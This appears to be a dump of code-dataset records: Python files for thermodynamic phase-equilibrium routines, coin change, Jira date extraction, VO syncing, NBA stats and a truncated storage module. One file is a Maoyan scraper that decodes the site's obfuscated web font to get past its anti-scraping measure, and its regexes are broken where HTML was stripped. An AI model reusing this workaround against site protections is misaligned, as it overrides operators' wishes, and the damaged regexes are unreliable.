VVBUB\n\t\t\tSL = SLB\n\t\t\tSV = SVB\n\t\t\tT = TBUB\n\t\t\t\n\t\t\t# ---END if\n\t\tXQ = (S - SL) / (SV - SL)\n\t\treturn [T, XQ,XL,XV, VL,VV, SL,SV]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef hpin (self, H,P,X ):\n\t\t# [T, XQ,XL,XV,VL,VV,HL,HV] = hpin ( H,P,X )\n\t\t# [P4, P5, P6, P7, P8, P9, P10, P11] = self.hpin ( P1,P2,P3 )\n\t\t# SUBROUTINE HPIN (H,P,X, T,XQ,XL,XV,VL,VV,HL,HV)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS WITH FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# THIS ROUTINE CALCULATES THE TEMPERATURE AND QUALITY OF A SINGLE\n\t\t# OR TWO-PHASE MIXTURE GIVEN THE PRESSURE AND THE OVERALL (BULK)\n\t\t# ENTHALPY AND COMPOSITION\n\t\t#\n\t\t# INPUTS:\n\t\t# H - ENTHALPY (KJ/KMOL) OF BULK MIXTURE\n\t\t# P - PRESSURE (KPA)\n\t\t# X - BULK COMPOSITION (MOLE FRACTION)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# T - EQUILIBRIUM TEMPERATURE OF SYSTEM (K)\n\t\t# XQ - EQUILIBRIUM QUALITY (MOLAR BASIS), NEGATIVE VALUES INDICATE\n\t\t# SUBCOOLED LIQUID. 
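\n\t\t# [python editor note] XQ is the molar lever rule XQ = (H-HL)/(HV-HL);\n\t\t# e.g. HL = 100, HV = 200 and bulk H = 150 give XQ = 0.5, while\n\t\t# H = 90 gives XQ = -0.1 (subcooled by this routine's convention).\n\t\t# 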
QUALITIES > 1 INDICATE SUPERHEATED VAPOR.\n\t\t# NOTE: THE QUALITIES COMPUTED FOR SINGLE PHASE CONDITIONS IN\n\t\t# THE ROUTINES HPIN, HTIN, SPIN, AND VTIN WILL NOT BE THE SAME.\n\t\t# XL - COMPOSITION OF LIQUID PHASE (MOLE FRACTION)\n\t\t# XV - COMPOSITION OF VAPOR PHASE (MOLE FRACTION)\n\t\t# VL - MOLAR VOLUME OF LIQUID PHASE (M**3/KMOL)\n\t\t# VV - MOLAR VOLUME OF VAPOR PHASE (M**3/KMOL)\n\t\t# HL - MOLAR ENTHALPY OF LIQUID PHASE (KJ/KMOL)\n\t\t# HV - MOLAR ENTHALPY OF VAPOR PHASE (KJ/KMOL)\n\t\t# NOTE: IF ONLY SUBCOOLED LIQUID IS PRESENT, VV AND HV ARE\n\t\t# COMPUTED AT THE BUBBLE POINT TEMPERATURE AND VAPOR COMPOSITION\n\t\t# IN EQUILIBRIUM WITH SATURATED LIQUID AT THE GIVEN P, XL.\n\t\t# IF ONLY SUPERHEATED VAPOR IS PRESENT, VL AND HL ARE\n\t\t# COMPUTED AT THE DEWPOINT TEMPERATURE AND LIQUID\n\t\t# COMPOSITION IN EQUILIBRIUM WITH SATURATED VAPOR AT THE\n\t\t# GIVEN P, XV.\n\t\t#\n\t\n\t\t#LOGICAL LCRIT,LCONV\n\t\t#DIMENSION X(5),XL(5),XV(5),XLB(5),XVB(5),XLD(5),XVD(5)\n\t\t#COMMON /NCOMP/ NC\n\t\t#COMMON /TOL/ TOLR,ITMAX,LUP\n\t\t#COMMON /TOLSH/ TOLH,TOLS\n\t\t#\n\t\t# COMPUTE BUBBLE AND DEW POINTS AT GIVEN CONDITIONS OF P AND X\n\t\t#\n\t\t\n\t\t#X = [[0.0] * (5+1)]\n\t\tXL = [0.0] * (5+1)\n\t\tXV = [0.0] * (5+1)\n\t\t\n\t\tXLB = [0.0] * (5+1)\n\t\tXVB = [0.0] * (5+1)\n\t\t\n\t\tXLD = [0.0] * (5+1)\n\t\tXVD = [0.0] * (5+1)\n\t\t\n\t\t# [P2, P3, P4, P5, P6, P8] = bublp ( P1, P2, P3, P7)\n\t\t[X, XV, TBUB, VL, VVBUB, LCRIT] = self.bublp (P, X, XV, True) # CALL BUBLP (P,X,XV ,TBUB, VL,VVBUB, .TRUE.,LCRIT)\t\t\n\t\t[XL,X, TDEW, VLDEW, VV, LCRIT] = self.bublp (P, XL, X, False) # CALL BUBLP (P,XL,X, TDEW,VLDEW,VV,.FALSE.,LCRIT)\n\t\t\n\t\tVLBUB = VL # in Python only\n\t\t\n\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t[HL, CV, CP, VSND] = self.hcvcps( 1, TBUB, VL, X )\t# CALL HCVCPS (1,TBUB,VL,X, HL,CV,CP,VSND)\n\t\t[HV, CV, CP, VSND] = self.hcvcps( 1, TDEW, VV, X )\t# CALL HCVCPS (1,TDEW,VV,X ,HV,CV,CP,VSND)\n\t\t\n\t\tif (H <= HL) :\n\t\t\t# SINGLE PHASE LIQUID\n\t\t\t#for I in range(1, BData.NC + 1): # DO 120 I=1,NC\n\t\t\t#\tXL[I] = X[I]\n\n\t\t\tXL = X[:]\n\t\t\tVV = VVBUB\n\t\t\tVLBUB = VL\n\t\t\t\n\t\t\t#[P7,P8] = self.hpxsp (P1,P2,P3, P4,P5,P6, P9)\n\t\t\t[T, VL] =self.hpxsp (H, P, X, TBUB, HL, VLBUB, True) #CALL HPXSP (H,P,X,TBUB,HL,VLBUB,T,VL,.TRUE.)\n\t\t\t\n\t\telif (H >= HV) :\n\t\t\t# SINGLE PHASE VAPOR\n\t\t\t#for I in range(1, BData.NC + 1): # DO 140 I=1,NC\n\t\t\t#\tXV[I] = X[I]\n\n\t\t\tXV = X[:]\n\t\t\tVL = VLDEW\n\t\t\tVVDEW= VV\n\t\t\t\n\t\t\t#[P7,P8] = self.hpxsp (P1,P2,P3, P4,P5,P6,P9 )\n\t\t\t[T, VV] = self.hpxsp (H, P, X, TDEW, HV, VVDEW, False) #CALL HPXSP (H,P,X,TDEW,HV,VVDEW,T,VV,.FALSE.)\n\t\t\t\n\t\telse:\n\n\t\t\t# TWO PHASE\n\t\t\tNCC = BData.NC\n\t\t\tfor I in range(1, BData.NC + 1): # DO 210 I=1,NC\n\t\t\t\tif (X[I] < BData.TOLR): NCC = NCC-1\n\t\t\t\t\n\t\t\t\tXLB[I] = X [I]\n\t\t\t\tXVB[I] = XV[I]\n\t\t\t\t\n\t\t\t\tXLD[I] = XL[I]\n\t\t\t\tXVD[I] = X [I]\n\t\t\t\t\n\t\t\tHLB = HL\n\t\t\tHVD = HV\n\t\t\t\n\t\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t\t[HVB, CV, CP, VSND] = self.hcvcps( 1, TBUB, VVBUB, XVB ) # CALL HCVCPS (1,TBUB,VVBUB,XVB ,HVB,CV,CP,VSND)\n\t\t\t[HLD, CV, CP, VSND] = self.hcvcps( 1, TDEW, VLDEW, XLD) # CALL HCVCPS (1,TDEW,VLDEW,XLD ,HLD,CV,CP,VSND)\n\t\t\t\n\t\t\tb_python_flag = False\n\t\t\tfor IT in range(1, int(BData.ITMAX/2 + 1)): #DO 260 IT=1,ITMAX/2\n\t\t\t\t# COMPUTE QUALITY BASED ON ENTHALPY; COMPUTED SEPARATELY FOR\n\t\t\t\t# BUBBLE AD DEW POINT CONDITIONS.\n\t\t\t\t#\n\t\t\t\tXQHB = (H-HLB) / 
(HVB-HLB)\n\t\t\t\tXQHD = (H-HLD) / (HVD-HLD)\n\t\t\t\t#\n\t\t\t\t# COMPUTE LENGTH OF TIE LINE CONNECTING LIQUID AND VAPOR\n\t\t\t\t# COMPOSITIONS AND QUALITIES BASED ON COMPOSITION.\n\t\t\t\t#\n\t\t\t\tIXQCB = 0\n\t\t\t\tIXQCD = 0\n\t\t\t\tXQCB = 0.0\n\t\t\t\tXQCD = 0.0\n\t\t\t\tTLINEB= 0.0\n\t\t\t\tTLINED= 0.0\n\t\t\t\t\n\t\t\t\tfor I in range(1, BData.NC + 1): #DO 214 I=1,NC\n\t\t\t\t\tif (XLB[I] != XVB[I] ):\n\t\t\t\t\t\tIXQCB = IXQCB + 1\n\t\t\t\t\t\tXQCB = XQCB +( X[I] - XLB[I] ) / ( XVB[I] - XLB[I] )\n\n\t\t\t\t\tTLINEB = TLINEB + ( XVB[I] - XLB[I] ) **2\n\t\t\t\t\t\n\t\t\t\t\tif (XLD[I] != XVD[I] ) :\n\t\t\t\t\t\tIXQCD = IXQCD + 1\n\t\t\t\t\t\tXQCD = XQCD + ( X[I] - XLD[I] ) / ( XVD[I] - XLD[I] )\n\t\t\t\t\t\t\n\t\t\t\t\tTLINED = TLINED + (XVD[I] - XLD[I] ) **2\n\t\t\t\t\t\n\t\t\t\tif (IXQCB > 0) :\n\t\t\t\t\tXQCB = XQCB / (IXQCB )\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tXQCB=XQHB\n\t\t\t\t\n\t\t\t\tif (IXQCD > 0) :\n\t\t\t\t\tXQCD=XQCD / (IXQCD )\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tXQCD=XQHD\n\t\t\t\t\n\t\t\t\tTLINEB = math.sqrt(TLINEB)\n\t\t\t\tTLINED = math.sqrt(TLINED)\n\t\t\t\t#\n\t\t\t\t# CHECK FOR CONVERGENCE\n\t\t\t\t#\n\t\t\t\tLCONV = True\n\t\t\t\tfor I in range (1, BData.NC + 1): # DO 220 I=1,NC\n\t\t\t\t\tif (abs(XVB[I] - XVD[I] ) > 0.0001): LCONV = False\n\t\t\t\t\t\n\t\t\t\tif (abs(XQCB-XQHB) > 0.0001): LCONV = False\n\t\t\t\tif (abs(XQCD-XQHD) > 0.0001): LCONV = False\n\t\t\t\t\n\t\t\t\tif (LCONV):\n\t\t\t\t\tb_python_flag = True\n\t\t\t\t\tbreak\t#GOTO 280\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\t# ASSIGN WEIGHTS TO BUBBLE AND DEW POINT CALCULATION\n\t\t\t\t#\n\t\t\t\tif (IT < 1 or NCC < 2) :\n\t\t\t\t\tWTB = 1.0 + (XQCB-XQHB) / ( (XQCD-XQHD) - (XQCB-XQHB) )\n\t\t\t\t\tWTD = 1.0 - (XQCD-XQHD) / ( (XQCD-XQHD) - (XQCB-XQHB) )\n\t\t\t\telse:\n\t\t\t\t\tDTSUMB = 0.0\n\t\t\t\t\tDTSUMD = 0.0\n\t\t\t\t\t\n\t\t\t\t\tfor J in range (1, (BData.NC-1) + 1):\t#DO 222 J=1,NC-1\n\t\t\t\t\t\tfor K in range (J+1, (BData.NC + 1) ): #DO 222 K=J+1,NC\n\t\t\t\t\t\t\tDTSUMB = DTSUMB + ((X[J] - XLB[J] ) * ( XVB[K] - XLB[K])\t\\\n\t\t\t\t\t\t\t\t- (X[K] - XLB[K]) * (XVB[J] - XLB[J] ) )**2\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tDTSUMD = DTSUMD + ((X[J] - XLD[J] ) * ( XVD[K] - XLD[K])\t\\\n\t\t\t\t\t\t\t\t- (X[K] - XLD[K]) * (XVD[J] - XLD[J] ) )**2\n\t\t\t\t\t\t\n\t\t\t\t\tDXBUB = 0.0\n\t\t\t\t\tDXDEW = 0.0\n\t\t\t\t\t\n\t\t\t\t\tfor I in range(1, BData.NC + 1): #DO 223 I=1,NC\n\t\t\t\t\t\tDXBUB = DXBUB + ( XLB[I] - XVB[I] ) **2\n\t\t\t\t\t\tDXDEW = DXDEW + ( XLD[I] - XVD[I] ) **2\n\t\t\t\t\t\t\n\t\t\t\t\tDXBUB = math.sqrt(DTSUMB/DXBUB)\n\t\t\t\t\tDXDEW = math.sqrt(DTSUMD/DXDEW)\n\t\t\t\t\tWTB = DXDEW / (DXDEW + DXBUB)\n\t\t\t\t\tWTD = DXBUB / (DXBUB + DXDEW)\n\t\t\t\t\t#============== END IF\n\t\t\t\t\n\t\t\t\tif (TLINEB/TLINED > 2.0 or TLINEB/TLINED < 0.5) :\n\t\t\t\t\tTLAVG = min(TLINEB,TLINED)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tTLAVG = (WTB*TLINEB+WTD*TLINED)\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\t# COMPUTE NEXT GUESSES FOR COMPOSITION OF LIQUID AND VAPOR\n\t\t\t\t# AND CARRY OUT CORRESPONDING BUBBLE AND DEW POINT CALCULATIONS.\n\t\t\t\t#\n\t\t\t\t\n\t\t\t\tfor I in range(1,BData.NC + 1): # DO 224 I=1,NC\n\t\t\t\t\tXLB2I = X[I] + TLAVG * ( WTB * XQHB + WTD * XQHD)\t\\\n\t\t\t\t\t\t* ( WTB * ( XLB[I] - XVB[I] ) / TLINEB + WTD * ( XLD[I] - XVD[I] ) / TLINED)\n\t\t\t\t\t\t\n\t\t\t\t\tXVD2I = X[I] - TLAVG * ( WTB * (1.0 - XQHB ) + WTD * (1.0 - XQHD) )\t\\\n\t\t\t\t\t\t* ( WTB * ( XLB[I] - XVB[I]) / TLINEB + WTD * ( XLD[I] - XVD[I] ) / TLINED )\n\t\t\t\t\t\t\n\t\t\t\t\tXLB[I] = XLB2I\n\t\t\t\t\tXVD[I] = 
XVD2I\n\t\t\t\t\n\t\t\t\t# [P2, P3, P4, P5, P6, P8] = bublp ( P1, P2, P3, P7)\n\t\t\t\t[XLB,XVB, TBUB, VLBUB, VVBUB, LCRIT] = self.bublp (P, XLB, XVB, True) # CALL BUBLP (P,XLB,XVB, TBUB,VLBUB,VVBUB,.TRUE.,LCRIT)\n\t\t\t\t[XLD,XVD, TDEW, VLDEW, VVDEW, LCRIT] = self.bublp (P, XLD, XVD, False) # CALL BUBLP (P,XLD,XVD, TDEW,VLDEW,VVDEW, False,LCRIT)\n\t\n\t\t\t\t\n\t\t\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t\t\t[HLB, CV, CP, VSND] = self.hcvcps( 1, TBUB, VLBUB, XLB) # CALL HCVCPS (1,TBUB,VLBUB,XLB, HLB,CV,CP,VSND)\n\t\t\t\t[HVB, CV, CP, VSND] = self.hcvcps( 1, TBUB, VVBUB, XVB) # CALL HCVCPS (1,TBUB,VVBUB,XVB ,HVB,CV,CP,VSND)\n\t\t\t\t[HLD, CV, CP, VSND] = self.hcvcps( 1, TDEW, VLDEW, XLD) # CALL HCVCPS (1,TDEW,VLDEW,XLD, HLD,CV,CP,VSND)\n\t\t\t\t[HVD, CV, CP, VSND] = self.hcvcps( 1, TDEW, VVDEW, XVD) # CALL HCVCPS (1,TDEW,VVDEW,XVD, HVD,CV,CP,VSND)\n\t\t\t\t\n\t\t\t\t# loop ===260 CONTINUE\n\t\t\t\t\n\t\t\tif not b_python_flag:\n\t\t\t\tprint (BData.LUP, 'ROUTINE HPIN DID NOT CONVERGE; H,P,X:', H,P, X ) # print array x\n\t\t\t\t#1000 FORMAT (1X,'ROUTINE HPIN DID NOT CONVERGE; H,P,X:',2F12.4,5F8.5)\n\t\t\t\n\t\t\t# come at this point 280 CONTINUE\n\t\t\t#\n\t\t\t# SOLUTION HAS CONVERGED; WRITE OUTPUT VARIABLES.\n\t\t\t#\n\t\t\t\n\t\t\t#for I in range(1,BData.NC + 1): #DO 284 I=1,NC\n\t\t\t#\tXL[I] = XLB[I]\n\t\t\t#\tXV[I] = XVB[I]\n\t\t\tXL = XLB [:]\n\t\t\tXV = XVB [:]\n\t\t\t\n\t\t\tVL = VLBUB\n\t\t\tVV = VVBUB\n\t\t\tHL = HLB\n\t\t\tHV = HVB\n\t\t\tT = TBUB\n\t\t# END IF\n\t\t\n\t\tXQ=(H-HL)/(HV-HL)\n\t\t\n\t\treturn [T, XQ,XL,XV, VL,VV, HL,HV]\n\t\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef U_Func (self, T,X,K,V,A,B,AP,BP,F ):\n\t\t#\n\t\t# FUNCTION SUBROUTINE FOR THE EVALUATION OF CHEMICAL POTENTIAL\n\t\t# (THE QUANTITY EVALUATED IS U/RT; ALSO SINCE ONLY DIFFERENCES\n\t\t# IN U ARE REQUIRED IN THE PROGRAM, ANY TERMS WHICH WOULD\n\t\t# CANCEL ARE OMITTED)\n\t\t#\n\t\t#\t FUNCTION U (T,X,K,V,A,B,AP,BP,F)\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t COMMON /RDATA4/ R\n\t\t#\t COMMON /NCOMP/ NC\n\t\t#\t DIMENSION AP(5),BP(5),F(5,5),X(5)\n\t\tDA = -2.0 * A\n\t\tDB = BP[K] - B\n\t\tSQAK= math.sqrt( AP[K] )\n\t\t\n\t\tfor I in range (1, BData.NC + 1 ):# DO 120 I=1,NC\n\t\t\tDA = DA + 2.0 * X[I] * math.sqrt( AP[I] ) * SQAK\n\t\t\tif (I != K): DA= DA - 2.0 * X[I] * F[K][I] * SQAK * math.sqrt( AP[I] )\n\t\t\t#120 CONTINUE\n\t\t\n\t\tB4V = 4.0 * V - B\n\t\t\n\t\tU = - math.log(V) \t\\\n\t\t\t- ( math.log ( (V+B) / V ) * ( A * (1.0-DB/B) + DA ) \t\\\n\t\t\t+ A * (DB+B)/(V+B))/(B* BData.R * T)\t\\\n\t\t\t+ (8.0 * V * BP[K] *( 8.0 * V-B ) / B4V + B * (16.0 * V - 3.0 * B))/(B4V*B4V)\n\t\treturn U\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . 
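# (Editor's aside -- illustration only, not part of the original CYCLE
# translation above.) The quality convention used by HPIN is the enthalpy
# lever rule XQ = (H - HL)/(HV - HL); values outside [0, 1] flag subcooled
# liquid or superheated vapor. A minimal standalone sketch, with made-up
# enthalpies in kJ/kmol:

def _quality_sketch(h, h_liq, h_vap):
	# Lever rule on molar enthalpy; assumes h_vap > h_liq.
	return (h - h_liq) / (h_vap - h_liq)

# _quality_sketch(18000.0, 12000.0, 30000.0)  -> 0.333...  (two-phase)
# _quality_sketch(33000.0, 12000.0, 30000.0)  -> 1.166...  (superheated vapor)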
\n\n#-----------------------------------------------------------\n# Job \t\t\t: \n#\n# Editor\t\t: aymhenry@gmail.com\n#-----------------------------------------------------------\n\n","sub_path":"modules_test/Cycle2Py_Rev03/cycle_classes/Block2.py","file_name":"Block2.py","file_ext":"py","file_size_in_byte":94111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"140755482","text":"class MakingChange:\n def minimumCoins(self, money, coins):\n\n # Return 1 if money(coin) is found in the array\n if money in coins:\n return 1\n\n if money < 1:\n return 0\n\n return self.min_change(coins, money, [0] * (money + 1))\n \n def min_change(self, coins, rem, re_array):\n if rem < 0:\n return -1\n\n if rem == 0:\n return 0\n\n if re_array[rem] != 0:\n return re_array[rem]\n\n max_value = 90000\n min_value = max_value\n for coin in coins:\n cr = self.min_change(coins, rem - coin, re_array)\n\n if (cr >= 0 and cr < min_value):\n min_value = 1 + cr\n\n re_array[rem] = -1 if (min_value == max_value) else min_value\n\n return re_array[rem]\n\n# print(MakingChange().minimumCoins(11, [1, 2, 5]))\n","sub_path":"MakingChangeSE.py","file_name":"MakingChangeSE.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"15184805","text":"from im_team_modules.jira_manager import JiraManager\nfrom pandas import DataFrame\nfrom numpy import nan\nfrom datefinder import find_dates\nfrom im_team_modules.my_password import username, password\nimport sys\n\n\ndef createdataframe(jql):\n\n # Create instance of JiraTechFeas class\n techfeas = JiraManager(username, password)\n\n # Pass jql query to JiraTechFeas to return issues and store in object\n try:\n techfeas.searchissues(jql)\n except:\n techfeas.killsession()\n print(\"Error with jql query\")\n print(jql)\n return None\n\n # Create holder dataframe to append to in loop\n df = DataFrame(columns=[\"jira_issue\", \"pdf_tf_date\", \"jira_tf_date\", \"pdf_p_num\", \"desc_p_num\"])\n\n for issue in techfeas.issues:\n\n try:\n techfeas.nextissue()\n except KeyError:\n continue\n\n if techfeas.techfeas is not None:\n\n # PDF Tech Feas Date Processing\n try:\n tfpdfdate = techfeas.techfeas[\"Technical Feasibility Date:\"]\n tfpdfdate = [date for date in find_dates(tfpdfdate)][0]\n except TypeError: # catch if date is not in recognizable date format, return actual\n tfpdfdate = techfeas.techfeas[\"Technical Feasibility Date:\"]\n except KeyError: # catch if field does not exist, return NULL\n tfpdfdate = \"field doesn't exist\"\n except IndexError: # catch additional errors from find_dates robustness\n tfpdfdate = nan\n\n # PDF Project Number Processing\n try:\n pdfprojnum = techfeas.techfeas[\"Project Code:\"]\n except KeyError:\n pdfprojnum = \"field doesn't exist\"\n else: # If PDF was unable to open, return NULL values\n tfpdfdate = nan\n pdfprojnum = nan\n\n try: # Attempt to find TF date in Jira Description\n tfdescdate = techfeas.description[\"TF Document Date:\"]\n tfdescdate = [date for date in find_dates(tfdescdate)][0]\n except TypeError: # If unable to find date value, return actual\n tfdescdate = techfeas.description[\"TF Document Date:\"]\n except KeyError: # If TF Document Date field doesn't exist, return NULL\n tfdescdate = nan\n except IndexError: # catch additional errors from find_dates for robustness\n tfdescdate = nan\n\n try: # Attempt to return project code from Jira description\n descprojnum = 
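# (Editor's aside -- illustration only, not part of createdataframe; shown as
# comments to leave the surrounding function untouched.) The recurring idiom
# in this script is "take the first datefinder hit, otherwise keep the raw
# string". In isolation, using the find_dates imported at the top of this file:
#
#     def first_date_or_raw(text):
#         for match in find_dates(text):
#             return match   # first recognizable date wins
#         return text        # nothing parsed; keep the raw value
#
#     first_date_or_raw("TF Document Date: 12 March 2019")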
techfeas.description[\"Project Code:\"]\n            except KeyError:  # If field does not exist, return NULL\n                descprojnum = nan\n\n            # Store new row of data for current Jira Issue\n            new = DataFrame({\"jira_issue\": [issue], \"pdf_tf_date\": [tfpdfdate],\n                             \"jira_tf_date\": [tfdescdate], \"pdf_p_num\": [pdfprojnum], \"desc_p_num\": [descprojnum]})\n\n            # Add new row of data to dataframe\n            df = df.append(new, ignore_index=True)\n\n    techfeas.killsession()\n\n    df.to_csv(\"//hnagroup/pmo/Investment Management/python_executables/python_csv_outputs/tech_feas_dates.csv\")\n\n\nif __name__ == \"__main__\":\n\n    f = open(\"pdfinspect.out\", \"w\")\n    sys.stdout = f\n\n    print(\"Running\")\n\n    # Guard against a missing argument; sys.argv always contains the script name\n    if len(sys.argv) > 1:\n        createdataframe(sys.argv[1])\n\n    f.close()\n","sub_path":"pdfinspect.py","file_name":"pdfinspect.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"400707867","text":"from fontTools.ttLib import TTFont\n\n'''\n    9\n    4\n\n\n\n'''\n# Instantiate the font object\n# font = TTFont('../data/maoyan2.woff')\n# font.saveXML('font2.xml')\n# Extract the cmap node\n# font_data_dict = font.getGlyphOrder()\n# print(font_data_dict)\n# Keep only the values\n# for value in font_data_dict.value:\n#     print(value)\n\nimport requests\n\nimport re\n\nimport os\n\nfrom fontTools.ttLib import TTFont\n\n\nclass MaoYan():\n\n    # Initialize the data we need\n    def __init__(self):\n\n        self.url = 'http://maoyan.com/films/1209159'\n\n        self.headers = {\n\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHT\"\n                          \"ML, like Gecko) Chrome/70.0.3538.110 Safari/537.36\",\n\n        }\n\n    # Send the request\n    def get_html(self, url):\n\n        response = requests.get(url, headers=self.headers)\n\n        return response.content\n\n    # Download the woff font file\n\n    def create_font(self, font_file):\n\n        # List the files already downloaded\n\n        file_list = os.listdir('./fonts')\n\n        # Check whether this font was downloaded before\n\n        if font_file not in file_list:\n            # If not, fetch the new woff font file\n\n            url = 'http://vfile.meituan.net/colorstone/' + font_file\n\n            new_file = self.get_html(url)\n\n            with open('./fonts/' + font_file, 'wb') as f:\n                f.write(new_file)\n\n        # Open the font file\n\n        self.font = TTFont('./fonts/' + font_file)\n\n    # Map the scraped data through the font to recover the real values\n\n    def modify_data(self, data):\n\n        # Open the locally saved woff file and set up the reference mapping\n\n        font2 = TTFont(\"./95ebcb3e871c993e8014b6cf244c939b2088.woff\")\n\n        keys = font2['glyf'].keys()\n\n        values = list(' .0714682953')\n\n        # Pair glyph names with their digit values\n\n        dict1 = dict((k, v) for k, v in zip(keys, values))\n\n        font1 = self.font\n\n        # Empty dict to hold the new replacement mapping\n\n        dict2 = {}\n\n        for key in font1[\"glyf\"].keys():\n\n            for k, v in dict1.items():\n\n                # Compare glyph definitions to fill the new name-to-digit mapping\n\n                if font2[\"glyf\"][k] == font1[\"glyf\"][key]:\n                    dict2[key] = v.strip()\n\n                    break\n\n        # Turn each glyph name into its &#x entity form and substitute it in the page data\n\n        for i in dict2:\n\n            gly = i.replace('uni', '&#x').lower() + ';'\n\n            if gly in data:\n                data = data.replace(gly, dict2[i])\n\n        return data\n\n    # Fetch the data\n\n    def start_crawl(self):\n\n        html = self.get_html(self.url).decode('utf-8')\n\n        # Regex match the font file\n\n        font_file = re.findall(r'vfile\\.meituan\\.net\\/colorstone\\/(\\w+\\.woff)', html)[0]\n\n        self.create_font(font_file)\n\n        # Regex match the rating\n\n        star = \\\n            re.findall(r'\\s+(.*?)\\s+', html)[0]\n\n        star = self.modify_data(star)\n\n        # Regex match the number of people who want to watch\n\n        people = re.findall(r'(.*?)', html, re.S)[0]\n\n        people = self.modify_data(people)\n\n        # Regex match the cumulative box office\n\n        ticket_number = re.findall(\n            r'
    \\s+(.*?)'\n r'(.*?)\\s+
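# (Editor's aside -- illustration only. The regex literals above lost their
# HTML tag text during extraction and are left as found.) The descrambling in
# modify_data reduces to plain entity substitution once the glyph-name ->
# digit mapping is known; a sketch with a made-up mapping (real glyph names
# come from the downloaded woff file):
#
#     glyph_to_digit = {'uniE893': '3', 'uniF57B': '8'}
#
#     def descramble(text, mapping):
#         for name, digit in mapping.items():
#             text = text.replace(name.replace('uni', '&#x').lower() + ';', digit)
#         return text
#
#     descramble('&#xe893;.&#xf57b;', glyph_to_digit)  # -> '3.8'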
    ',\n html)[0]\n\n ticket_number1 = self.modify_data(ticket_number[0])\n\n print('用户评分: %s' % star)\n\n print('评分人数: %s' % people)\n\n print('累计票房: %s' % ticket_number1, ticket_number[1])\n\n\nif __name__ == '__main__':\n maoyan = MaoYan()\n\n maoyan.start_crawl()\n","sub_path":"pachong/maoyan.py","file_name":"maoyan.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"79338150","text":"#!/usr/bin/python\n\nimport string\nimport sys\nimport urllib2\nimport httplib\nimport logging\nimport Poem.django_logging\nfrom Poem import settings\nfrom Poem.poem import models\nfrom django.db import connection, transaction\nfrom xml.etree import ElementTree\n\nlogging.basicConfig(format='%(filename)s[%(process)s]: %(levelname)s %(message)s', level=logging.INFO)\nlogger = logging.getLogger(\"POEM\")\n\ndef main():\n \"Parses VO list provided by CIC portal\"\n\n try:\n ret = urllib2.urlopen(settings.CIC_VO_URL).read()\n except Exception as e:\n logger.error('VO card - '+'%s' % (e))\n sys.exit(1)\n try:\n Root = ElementTree.XML(ret)\n idcards = Root.findall(\"IDCard\")\n except Exception as e:\n logger.error('Could not parse VO card - '+'%s' % (e))\n sys.exit(1)\n if len(idcards) > 0:\n vos = []\n for vo_element in idcards:\n dict_vo_element = dict(vo_element.items())\n if dict_vo_element.has_key('Name') == False or dict_vo_element.has_key('Status') == False:\n logger.warning(\"vo card does not contain 'Name' and 'Status' attributes for %s\" % vo_element)\n else:\n if dict_vo_element['Status'].lower() == 'production' and dict_vo_element['Name'] != '':\n vos.append(dict_vo_element['Name'])\n else:\n logger.error(\"Error synchronizing VO due to invalid VO card\")\n sys.exit(1)\n\n voindb = set([(vo.name,) for vo in models.VO.objects.all()])\n if len(voindb) != len(vos):\n svos = set([(vo,) for vo in vos])\n cur = connection.cursor()\n if len(voindb) < len(vos):\n cur.executemany('INSERT INTO poem_vo VALUES (?)', svos.difference(voindb))\n logger.info(\"Added %d VO\" %\\\n (len(vos) - len(voindb)))\n elif len(voindb) > len(vos):\n cur.executemany('DELETE FROM poem_vo WHERE name IN (?)', voindb.difference(svos))\n logger.info(\"Deleted %d VO\" %\\\n (len(voindb) - len(vos)))\n transaction.commit_unless_managed()\n connection.close()\n else:\n logger.info(\"VO database is up to date\")\n\nmain()\n","sub_path":"poem/Poem/sync/poem-syncvo.py","file_name":"poem-syncvo.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"492946527","text":"from nba_api.stats.endpoints import teamyearbyyearstats\n\n# Input Examples\n# team_id = 1610612752 (Knicks)\n# year = \"2000-01\"\ndef get_year_stats(team_id, year):\n team_historic_data = teamyearbyyearstats.TeamYearByYearStats(team_id)\n df = team_historic_data.get_data_frames()\n result = df[0].query('YEAR==@year').head(1)\n return result","sub_path":"api/TeamYearByYearStats.py","file_name":"TeamYearByYearStats.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"216499675","text":"#!/usr/bin/python3\n\"\"\"This module defines a class to manage file storage for hbnb clone\"\"\"\n\nfrom models.base_model import Base\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom 
